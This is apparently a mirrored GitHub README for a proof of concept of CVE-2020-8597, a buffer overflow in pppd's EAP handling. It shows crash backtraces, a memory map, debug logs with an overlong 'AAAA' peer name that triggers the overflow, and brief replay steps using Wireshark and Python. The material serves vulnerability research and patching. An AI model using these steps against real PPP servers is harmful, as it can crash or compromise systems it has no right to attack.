Giter VIP home page Giter VIP logo

cve-2020-8597's Introduction

CVE-2020-8597

eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.

If you manage to get "EAP: unauthenticated peer name" long enough, seems like my client limits it to 255, you can do Buffer Overflow.

You still have to beat the Stack Canaries, so crash is the most possible.

Ubuntu 16.04.6 LTS and possibly other will have these protecions:

RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH	Symbols		FORTIFY	Fortified	Fortifiable  FILE
Full RELRO      Canary found      NX enabled    PIE enabled     No RPATH   No RUNPATH   No Symbols      Yes	12		22	/usr/sbin/pppd

Affects ppp and pppoe (PPP over Ethernet)

Source (patch):

https://github.com/paulusmack/ppp/commit/8d7970b8f3db727fe798b65f3377fe6787575426

*** buffer overflow detected ***: pppd terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fea131337e5]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7fea131d515c]
/lib/x86_64-linux-gnu/libc.so.6(+0x117160)[0x7fea131d3160]
pppd[0x42a858]
pppd(main+0x95f)[0x40981f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fea130dc830]
pppd(_start+0x29)[0x409db9]
======= Memory map: ========
00400000-00448000 r-xp 00000000 fd:01 11540966                           /usr/sbin/pppd
00648000-00649000 r--p 00048000 fd:01 11540966                           /usr/sbin/pppd
00649000-0064f000 rw-p 00049000 fd:01 11540966                           /usr/sbin/pppd
0064f000-0069b000 rw-p 00000000 00:00 0 
01c7b000-01c9c000 rw-p 00000000 00:00 0                                  [heap]
7fea12666000-7fea1267c000 r-xp 00000000 fd:01 13898255                   /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1267c000-7fea1287b000 ---p 00016000 fd:01 13898255                   /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1287b000-7fea1287c000 rw-p 00015000 fd:01 13898255                   /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1287c000-7fea12887000 r-xp 00000000 fd:01 13908799                   /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12887000-7fea12a86000 ---p 0000b000 fd:01 13908799                   /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a86000-7fea12a87000 r--p 0000a000 fd:01 13908799                   /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a87000-7fea12a88000 rw-p 0000b000 fd:01 13908799                   /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a88000-7fea12a8e000 rw-p 00000000 00:00 0 
7fea12a8e000-7fea12a99000 r-xp 00000000 fd:01 13908792                   /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12a99000-7fea12c98000 ---p 0000b000 fd:01 13908792                   /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c98000-7fea12c99000 r--p 0000a000 fd:01 13908792                   /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c99000-7fea12c9a000 rw-p 0000b000 fd:01 13908792                   /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c9a000-7fea12cb0000 r-xp 00000000 fd:01 13908797                   /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12cb0000-7fea12eaf000 ---p 00016000 fd:01 13908797                   /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eaf000-7fea12eb0000 r--p 00015000 fd:01 13908797                   /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eb0000-7fea12eb1000 rw-p 00016000 fd:01 13908797                   /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eb1000-7fea12eb3000 rw-p 00000000 00:00 0 
7fea12eb3000-7fea12ebb000 r-xp 00000000 fd:01 13908803                   /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea12ebb000-7fea130ba000 ---p 00008000 fd:01 13908803                   /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130ba000-7fea130bb000 r--p 00007000 fd:01 13908803                   /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130bb000-7fea130bc000 rw-p 00008000 fd:01 13908803                   /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130bc000-7fea1327c000 r-xp 00000000 fd:01 13908802                   /lib/x86_64-linux-gnu/libc-2.23.so
7fea1327c000-7fea1347c000 ---p 001c0000 fd:01 13908802                   /lib/x86_64-linux-gnu/libc-2.23.so
7fea1347c000-7fea13480000 r--p 001c0000 fd:01 13908802                   /lib/x86_64-linux-gnu/libc-2.23.so
7fea13480000-7fea13482000 rw-p 001c4000 fd:01 13908802                   /lib/x86_64-linux-gnu/libc-2.23.so
7fea13482000-7fea13486000 rw-p 00000000 00:00 0 
7fea13486000-7fea13489000 r-xp 00000000 fd:01 13908787                   /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13489000-7fea13688000 ---p 00003000 fd:01 13908787                   /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13688000-7fea13689000 r--p 00002000 fd:01 13908787                   /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13689000-7fea1368a000 rw-p 00003000 fd:01 13908787                   /lib/x86_64-linux-gnu/libdl-2.23.so
7fea1368a000-7fea1368c000 r-xp 00000000 fd:01 13908804                   /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1368c000-7fea1388b000 ---p 00002000 fd:01 13908804                   /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388b000-7fea1388c000 r--p 00001000 fd:01 13908804                   /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388c000-7fea1388d000 rw-p 00002000 fd:01 13908804                   /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388d000-7fea13896000 r-xp 00000000 fd:01 13908796                   /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13896000-7fea13a95000 ---p 00009000 fd:01 13908796                   /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a95000-7fea13a96000 r--p 00008000 fd:01 13908796                   /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a96000-7fea13a97000 rw-p 00009000 fd:01 13908796                   /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a97000-7fea13ac5000 rw-p 00000000 00:00 0 
7fea13ac5000-7fea13aeb000 r-xp 00000000 fd:01 13908788                   /lib/x86_64-linux-gnu/ld-2.23.so
7fea13cb5000-7fea13cba000 rw-p 00000000 00:00 0 
7fea13ce5000-7fea13ce6000 rw-p 00000000 00:00 0 
7fea13ce6000-7fea13cea000 rw-s 00000000 00:17 983                        /run/pppd2.tdb
7fea13cea000-7fea13ceb000 r--p 00025000 fd:01 13908788                   /lib/x86_64-linux-gnu/ld-2.23.so
7fea13ceb000-7fea13cec000 rw-p 00026000 fd:01 13908788                   /lib/x86_64-linux-gnu/ld-2.23.so
7fea13cec000-7fea13ced000 rw-p 00000000 00:00 0 
7ffc7c941000-7ffc7c962000 rw-p 00000000 00:00 0                          [stack]
7ffc7c9b3000-7ffc7c9b6000 r--p 00000000 00:00 0                          [vvar]
7ffc7c9b6000-7ffc7c9b8000 r-xp 00000000 00:00 0                          [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0                  [vsyscall]

From the debug logs:

using channel 447
Using interface ppp0
Connect: ppp0 <--> /dev/pts/20
sent [LCP ConfReq id=0x1 <mru 1492> <auth eap> <magic 0x2906ea8c>]
rcvd [LCP ConfAck id=0x1 <mru 1492> <auth eap> <magic 0x2906ea8c>]
rcvd [LCP ConfReq id=0x1 <mru 1492> <magic 0xc17bf331>]
sent [LCP ConfAck id=0x1 <mru 1492> <magic 0xc17bf331>]
sent [LCP EchoReq id=0x0 magic=0x2906ea8c]
sent [EAP Request id=0x8a Identity <Message "Name">]
rcvd [LCP EchoReq id=0x0 magic=0xc17bf331]
sent [LCP EchoRep id=0x0 magic=0x2906ea8c]
rcvd [LCP EchoRep id=0x0 magic=0xc17bf331]
rcvd [EAP Response id=0x8a Identity <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]
EAP: unauthenticated peer name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
sent [EAP Request id=0x8b MD5-Challenge <Value da 96 c9 38 6f d1 fc 22 81 6b a7 af 4a 9f eb 26 5e 8b 6d bb> <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]
rcvd [EAP Response id=0x8b MD5-Challenge <Value 7e 77 70 2d 93 ea b2 ff ef 28 a7 ea b7 2f c7 93> <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]

You can work with Wireshark to capture the frame and for example Python to reply it.

You should set the EAP Request Identity Type to some long/big value, than perform EAP-MD5 challenge.

Attached is a sample EAP-MD5 Challenge (You need to adjust expected ID) eap-md5.py.

cve-2020-8597's People

Contributors

marcinguy avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.